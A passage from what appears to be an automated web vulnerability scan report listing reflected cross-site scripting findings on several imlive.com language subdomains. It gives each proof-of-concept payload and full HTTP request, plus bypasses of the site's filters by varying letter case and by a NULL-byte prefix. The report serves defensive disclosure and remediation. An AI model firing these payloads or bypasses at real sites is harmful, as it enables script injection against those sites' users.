Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: spvdr=vd=7a755e33-be6e-4c0d-be05-9c18484cccd6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:04 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:03 GMT
Connection: close
Content-Length: 19890
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
Set-Cookie: spvdr=vd=df13fca7-243b-46a1-b685-4ed2e476c681&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:03 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 20266
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;">
...[SNIP]...

2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af143dyttqznmg552yp4pnmv; path=/; HttpOnly
Set-Cookie: spvdr=vd=a7e3d806-3337-4a1b-9339-464061ff6408&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 19093
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mx.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fvqwrzet5puogjqpwavrxj3x; path=/; HttpOnly
Set-Cookie: spvdr=vd=79ce1b5f-ccb1-46f8-b915-4f1fe4dd4ae4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 18918
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;">
...[SNIP]...

2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: spvdr=vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 18736
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
Set-Cookie: spvdr=vd=3419e649-d6e5-4718-8e93-cb3b4fbfb4cb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 19137
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||b38ce"><script>alert(1)</script>70a1d0b675c~1');return false;">
...[SNIP]...

2.158. http://nl.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=nl.imlive.com&ul=/webcam-login/abf97'onerror='alert(1)'3747a08c954/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://nl.imlive.com:80/webcam-login/abf97'onerror='alert(1)'3747a08c954/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
Set-Cookie: spvdr=vd=156b6ee5-1005-4d39-882a-3bd71de99522&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 19351
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;">
...[SNIP]...

2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
Set-Cookie: spvdr=vd=09b187c9-533d-4717-92f4-f93e601cfbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:18 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18872
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/?b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&iy=dallas&id=44&iu=1&vd=09b187c9-533d-4717-92f4-f93e601cfbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.161. http://no.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=no.imlive.com&ul=/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://no.imlive.com:80/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gxuklwm2wc54o44500sn3n55; path=/; HttpOnly
Set-Cookie: spvdr=vd=d5599b14-175a-410b-9d97-113f02fc9ecd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21862
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;">
...[SNIP]...

2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ix2kvm0dkimmd45cjweuero; path=/; HttpOnly
Set-Cookie: spvdr=vd=918cb142-ac05-44ff-b781-bebd10f67a21&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 21461
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

